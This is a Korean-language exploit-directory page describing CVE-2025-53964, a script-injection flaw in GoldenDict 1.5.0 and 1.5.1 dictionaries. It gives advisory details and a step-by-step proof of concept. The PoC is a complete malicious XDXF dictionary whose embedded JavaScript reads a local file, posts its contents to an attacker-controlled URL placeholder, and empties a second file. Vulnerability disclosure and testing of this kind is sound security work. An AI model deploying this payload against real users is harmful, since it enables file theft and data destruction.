Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-53964 | Kitploit
도구/GitHubGitHub/tigr78/cve-2025-53964
Static AnalysisVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubtigr78/cve-2025-53964

CVE-2025-53964

저장소 보기
9개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-53964

위험 평가

CVSS v3: (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L) - 9.6/10

설명

GoldenDict 1.5.0 및 1.5.1에는 노출된 위험한 메서드가 있어, 사용자가 조작된 사전을 추가한 후 해당 사전에 포함된 용어를 검색하면 파일을 읽고 수정할 수 있습니다.

추가 정보

이 제품은 외부 행위자와의 상호 작용을 위한 인터페이스를 제공하며, 여기에는 GoldenDict(ver. 1.5.0, 1.5.1)의 위험한 메서드가 포함되어 있으나 적절히 제한되지 않습니다. 이로 인해 원격 공격자는 준비된 악성 사전이 프로그램에 추가되어 사용될 때 사용자 파일 시스템의 파일을 읽고 수정할 수 있는 접근 권한을 얻게 됩니다.

취약점 유형

CWE-749: Exposed Dangerous Method or Function; CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

제품 공급업체

GoldenDict Project

영향을 받는 제품 코드 베이스

GoldenDict - 1.5.0, 1.5.1

영향을 받는 구성 요소

GoldenDict 실행 파일, 소스 코드 파일 xdxf.cc, 소스 코드 파일 xdxf2html.cc, 소스 코드 파일 stardict.cc.

공격 유형

원격

영향: 코드 실행

true

영향: 정보 공개

true

CVE 기타 영향

사용자 파일 시스템의 파일을 읽고 수정할 수 있는 접근

공격 벡터

취약점을 악용하려면 사용자가 악성 사전을 프로그램에 추가하고 해당 사전에 포함된 용어를 검색해야 합니다.

발견자

Grebennikov Timofey, Astra Group 개발 부문 보안 통제 부서의 침투 테스트 그룹 전문가

참조

https://github.com/goldendict/goldendict/releases

세부 정보

GoldenDict는 Wikipedia 및 로컬에 설치된 사전에서 용어를 검색하기 위한 그래픽 프로그램입니다. XML 마크업이 포함된 XDXF 형식을 포함하여 다양한 사전 형식이 지원됩니다. 사전은 다른 사용자들이 인터넷에서 배포합니다.

이 프로그램은 Qt Widgets 구성 요소 패키지에 포함된 브라우저 엔진을 사용하여 사전의 단어를 렌더링하고 표시합니다.

치명적인 취약점을 구현할 수 있게 하는 여러 보안 위반 사항이 동시에 발견되었습니다:

  1. XML 콘텐츠의 정화(sanitization) 부재;
  2. JS 코드 실행 금지 부재;
  3. 비활성화되었거나 취약한 CSP 정책.

이러한 위반 사항들이 결합되면 인터넷에서 다운로드한 XDXF 사전의 XML 마크업에 악성 JS 코드를 삽입하여 사용자 파일에 접근할 수 있는 가능성이 생깁니다.

개념 증명

Windows에서 취약점을 테스트하려면 파일 시스템에 준비된 두 개의 파일에 영향을 주는 스크립트를 실행할 수 있습니다.

  1. C:\Users\Public\Documents 디렉터리에 두 개의 파일을 만들고 임의의 내용을 채웁니다:
  • secret.txt – 일부 기밀 정보;
  • idea.txt – 잃고 싶지 않은 중요한 정보.
  1. 다음 내용으로 XDXF 사전 malicious_dictionary.xdxf를 만듭니다:
root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<xdxf lang_from="ENG" lang_to="RUS" format="logical">
    <full_name>Malicious dictionary</full_name>
    <description>You have been pwned!</description>
    <meta_info>
        <copyright>Public Domain</copyright>
    </meta_info>
    <lexicon>
        <ar>
            <k>vuln_test</k>
            <def>
                Some description...
                <script>
                    var secretFile = 'file:///C:/Users/Public/Documents/secret.txt';
                    var ideaFile = 'file:///C:/Users/Public/Documents/idea.txt';
                    var xhr = new XMLHttpRequest();
                    xhr.open('GET', secretFile, true);
                    xhr.onload = function() {
                        var secretData = xhr.responseText;
                        if (secretData.length > 0) {
                            var xhr2 = new XMLHttpRequest();
                            xhr2.open('POST', '[Target-URL]', true);
                            xhr2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                            xhr2.send('data=' + encodeURIComponent(secretData));
                        }
                    };
                    xhr.onerror = function() {
                    };
                    xhr.send();
                    var xhr3 = new XMLHttpRequest();
                    xhr3.open('PUT', ideaFile, true);
                    xhr3.setRequestHeader('Content-Type', 'text/plain');
                    xhr3.send("");
                </script>
            </def>
        </ar>
    </lexicon>
</xdxf>

이 사전이 초기화되면 secret.txt의 내용을 원격 서버로 전송하고 idea.txt를 비웁니다.

  1. [Target-URL] 템플릿을 직접 제어하는 HTTP 요청 수신기의 주소로 교체합니다.
  2. 생성된 사전을 GoldenDict의 로컬 사전 목록에 추가합니다.
  3. "vuln-test" 용어를 검색합니다.

공격 성공 여부를 확인합니다 – 수신자는 secret.txt 파일의 내용이 포함된 메시지를 받게 되며, idea.txt 파일은 비어 있게 됩니다.

이 취약점은 Windows 및 Linux 시스템 모두에 영향을 미칩니다. Linux 시스템에서 취약점을 재현하려면 테스트 파일을 저장할 다른 디렉터리를 사용하고 이를 악성 코드에 지정해야 합니다.

도구 다운로드